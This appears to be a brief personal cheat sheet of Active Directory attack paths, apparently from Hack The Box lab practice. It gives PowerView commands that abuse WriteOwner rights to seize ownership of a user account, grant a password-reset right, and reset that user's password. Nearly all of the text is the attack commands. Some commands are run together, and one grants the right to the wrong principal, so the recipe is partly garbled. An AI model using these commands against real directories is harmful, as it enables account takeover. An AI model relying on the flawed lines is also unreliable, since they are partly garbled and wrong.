Active Directory Attack paths(with exploitation)(will be updated as I learn more):
- Abusing WriteOwner rights:
a) Change owner of claire to ourselves(tom)
Set-DomainObjectOwner -Identity claire -OwnerIdentity tom Set-DomainObjectOwner -Identity <target-user> -OwnerIdentity <current-user>
b) Get Reset Password permission.
Add-DomainObjectAcl -TargetIdentity htb\claire -PrincipalIdentity htb\claire -Rights ResetPasswordAdd-DomainObjectAcl -TargetIdentity <target-user> -PrincipalIdentity <target-user> -Rights ResetPassword
c) Change Password.
Set-DomainObjectOwner -Identity claire -OwnerIdentity tom -verbose
Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity tom -verbose
$newpass = ConvertTo-SecureString -String 'P@$$w0rd!1234' -AsPlainText -Force
Set-DomainUserPassword -Identity claire -AccountPassword $newpass -verbose